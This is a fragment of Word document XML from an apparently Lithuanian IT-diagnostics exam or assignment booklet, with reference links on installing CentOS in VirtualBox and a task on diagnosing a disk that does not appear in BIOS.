          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kokias IS diagnostines priemones ir įrankius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="66D648FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudo</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jote</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="66D648FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atli</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kdami </w:t>
      </w:r>
      <w:r w:rsidR="66D648FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IS diagnostiką.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E6197" w14:textId="77777777" w:rsidR="008F3A4A" w:rsidRPr="005A5C28" w:rsidRDefault="008F3A4A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E31A6B" w14:textId="4E688E0D" w:rsidR="74650F4D" w:rsidRPr="005A5C28" w:rsidRDefault="499AA7F5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F6F12C" w14:textId="744F0BE0" w:rsidR="74650F4D" w:rsidRPr="005A5C28" w:rsidRDefault="44947B47" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Installing and using VirtualBox on CentOS. (2020, lapkričio 20).</w:t>
      </w:r>
      <w:r w:rsidR="7C71D979" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C71D979" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CentOS.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="684277BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="499AA7F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://wiki.centos.org/HowTos/Virtualization/VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2BB5D1" w14:textId="73431946" w:rsidR="74650F4D" w:rsidRPr="005A5C28" w:rsidRDefault="0B842093" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="author-name"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tavares P. (2021, sausio 7). </w:t>
      </w:r>
      <w:r w:rsidR="1C4CF5BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Installing and Configuring CentOS 8 on Virtualbox</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A65E0C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">InfoSec. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="499AA7F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FD031" w14:textId="012CB608" w:rsidR="0036600A" w:rsidRPr="005A5C28" w:rsidRDefault="72381456" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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How to install CentOS 8 with VirtualBox 6.1 on Windows 10. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vitux.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="00704E3F" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://vitux.com/install-centos-with-virtualbox-on-windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D54F575" w14:textId="506A6BF9" w:rsidR="45E4E05A" w:rsidRPr="005A5C28" w:rsidRDefault="1659E037" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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13 Linux Network Configuration and Troubleshooting Commands. Prieiga per internetą: https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA7A4C5" w14:textId="365F5CDA" w:rsidR="60108A71" w:rsidRPr="005A5C28" w:rsidRDefault="60108A71" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24340186" w14:textId="0AD9E918" w:rsidR="780E6FAA" w:rsidRPr="005A5C28" w:rsidRDefault="677580BF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="41898690" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="41898690" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="26B75079" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NUSTATYTI KOMPIUTERINĖS SI</w:t>
      </w:r>
      <w:r w:rsidR="53EFC0A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="26B75079" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TEMOS APARATINĮ GEDIMĄ</w:t>
      </w:r>
      <w:r w:rsidR="41898690" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F28FC" w14:textId="01158730" w:rsidR="780E6FAA" w:rsidRPr="005A5C28" w:rsidRDefault="1F583EB1"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UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="2D423EA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jums p</w:t>
      </w:r>
      <w:r w:rsidR="00A67C54" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ateikta</w:t>
      </w:r>
      <w:r w:rsidR="7B66A15B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterinė sistema</w:t>
      </w:r>
      <w:r w:rsidR="2121000C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="7B66A15B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="07BC08C0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tacionarus</w:t>
      </w:r>
      <w:r w:rsidR="7B66A15B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuteris</w:t>
      </w:r>
      <w:r w:rsidR="4DA75792" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir monitorius)</w:t>
      </w:r>
      <w:r w:rsidR="3205714B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="53CCA89F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3D9F2FE1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įjungus kompiuterį operacinė sistema</w:t>
      </w:r>
      <w:r w:rsidR="000F11A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> nepasileidžia</w:t>
      </w:r>
      <w:r w:rsidR="3D9F2FE1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. BIOS</w:t>
      </w:r>
      <w:r w:rsidR="00545DA2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> aplinkoje</w:t>
      </w:r>
      <w:r w:rsidR="08AD09C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> vidinis diskas</w:t>
      </w:r>
      <w:r w:rsidR="3D9F2FE1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSD arba</w:t>
      </w:r>
      <w:r w:rsidR="338490C3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> HDD yra</w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne</w:t>
      </w:r>
      <w:r w:rsidR="008D5486" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rodo</w:t>
      </w:r>
      <w:r w:rsidR="00225D71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mas</w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidR="001E15C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">jo </w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>negalima pasiri</w:t>
      </w:r>
      <w:r w:rsidR="0CC1046B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kti per </w:t>
      </w:r>
      <w:r w:rsidR="007C2D71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="67AA80EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">oot </w:t>
      </w:r>
      <w:r w:rsidR="0CD16C34" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ptions</w:t>
      </w:r>
      <w:r w:rsidR="007C2D71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="1D316CA7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>meni</w:t>
      </w:r>
      <w:r w:rsidR="00AF507C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="1929C283" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF507C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įvardinkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="53AC9E84" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>suged</w:t>
      </w:r>
      <w:r w:rsidR="4048E5D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>usį komponentą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF507C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">glaustai aprašykite </w:t>
      </w:r>
      <w:r w:rsidR="53AC9E84" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">gedimo </w:t>
      </w:r>
      <w:r w:rsidR="31504405" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>priežastį</w:t>
      </w:r>
      <w:r w:rsidR="53AC9E84" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94B00D" w14:textId="73431946" w:rsidR="007C025D" w:rsidRPr="005A5C28" w:rsidRDefault="007C025D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AB9982" w14:textId="6357E90E" w:rsidR="4879B68C" w:rsidRPr="005A5C28" w:rsidRDefault="64B8B005" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436690B5" w14:textId="5EEBFF1F" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="023C6FCD" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Lai</w:t>
      </w:r>
